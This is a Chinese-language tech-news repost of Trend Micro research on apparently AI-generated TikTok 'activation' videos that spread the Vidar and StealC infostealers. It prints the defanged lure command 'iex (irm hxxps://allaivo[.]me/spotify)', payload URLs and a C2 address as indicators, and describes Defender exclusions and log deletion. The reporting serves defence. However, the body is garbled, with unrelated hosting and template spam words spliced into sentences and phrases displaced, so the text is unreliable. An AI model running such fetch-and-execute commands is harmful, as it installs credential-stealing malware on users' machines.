您现在的位置是:物联网 >>正文
AI 生成恶意软件:TikTok 视频通过 PowerShell 命令传播信息窃取程序
物联网1人已围观
简介趋势科技Trend Micro)最新研究揭露,TikTok平台正出现一种新型威胁:AI生成的视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的信息窃取恶意软件风险之下。导致Vidar和St ...
趋势科技(Trend Micro)最新研究揭露 ,生成视频TikTok平台正出现一种新型威胁:AI生成的恶意视频诱骗用户执行恶意PowerShell命令 ,使其暴露在强大的软件信息窃取恶意软件风险之下。

导致Vidar和StealC恶意软件的通过感染链条 | 图片来源 :Trend Micro
社交工程攻击新手法趋势科技近期曝光了一起危险的社交工程攻击活动,黑客利用TikTok的亿华云命令病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族 。网络犯罪分子通过AI生成内容和利用用户信任 ,传播程序将看似无害的信息视频教程转变为恶意软件传播载体。
报告指出:"这类攻击使用视频(可能由AI生成)诱导用户执行PowerShell命令,生成视频这些命令被伪装成软件激活步骤 。恶意"
攻击传播机制攻击始于@gitallowed、免费模板软件@zane.houghton和@sysglow.wow等TikTok账号分享的通过匿名教程视频,指导观众激活Windows、命令Spotify或CapCut等软件 。传播程序部分视频播放量超过50万次,信息展示的生成视频"激活"步骤最终会引导用户执行如下PowerShell命令:
复制iex (irm hxxps://allaivo[.]me/spotify)1.趋势科技强调:"视频指示观众运行一系列命令...指导语音也疑似AI生成,进一步表明攻击者使用AI工具制作这些视频 。服务器租用"
该命令会下载并执行远程脚本,启动一个兼具隐蔽性和持久性的恶意软件投放链。
攻击流程详解用户观看TikTok视频后直接执行PowerShell命令从hxxps://allaivo[.]me/spotify下载并运行远程脚本在APPDATA和LOCALAPPDATA创建隐藏目录,并添加到Windows Defender排除列表下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC从hxxps://amssh[.]co/script.ps1获取最终持久化脚本,使恶意软件能在系统重启后继续运行删除日志和临时文件夹以掩盖取证证据趋势科技警告称 :"脚本采用重试逻辑确保有效载荷成功下载 ,高防服务器然后以隐藏的提升权限进程启动恶意软件可执行文件 。"
新型C&C通信技术恶意软件激活后,会使用新型规避技术与命令控制(C&C)服务器通信 :
Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers(DDR,死投解析器),将真实服务器地址隐藏在个人资料元数据中StealC直接连接基于IP的终端(如91[.]92[.]46[.]70)研究人员指出 :"Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器。"
AI驱动的源码库恶意软件新时代TikTok算法放大效应与AI生成欺骗手段的结合,标志着恶意软件传播进入新时代。正如趋势科技强调 :"AI生成内容的使用 ,使这类攻击从孤立事件升级为高度可扩展的运营活动 。"
云计算Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/news/139e499856.html
下一篇:数据保护需要基于AI的安全策略
相关文章
理解OT环境中的网络安全
物联网运营技术如果没有交通信号灯、大量生产的食物、按一下按钮的能源或容易获得的汽车燃料,生活会是什么样子?运营技术 (OT) 使所有这些事情发生,并以明显或隐蔽的方式渗透到我们的生活中,自动监控和控制对于手 ...
【物联网】
阅读更多LGGram笔记本的全面评测(轻薄长续航,打破传统笔记本束缚)
物联网随着科技的进步和人们对便携性的需求不断增加,轻薄笔记本成为了市场的热门产品。而LGGram系列作为一款备受瞩目的笔记本,以其轻薄机身和长续航时间,成功地打破了传统笔记本的束缚。本文将对LGGram笔记 ...
【物联网】
阅读更多一夜闪崩35%:全球显卡价格开始破发,30系降幅四千上热搜
物联网全球性的芯片短缺还在继续,消费级显卡价格却雪崩了。最近一段时间,英伟达、AMD 显卡降价的消息越来越多。据澳大利亚 YouTube 频道 HardwareUnboxed 报道,华硕 RTX 3080 ...
【物联网】
阅读更多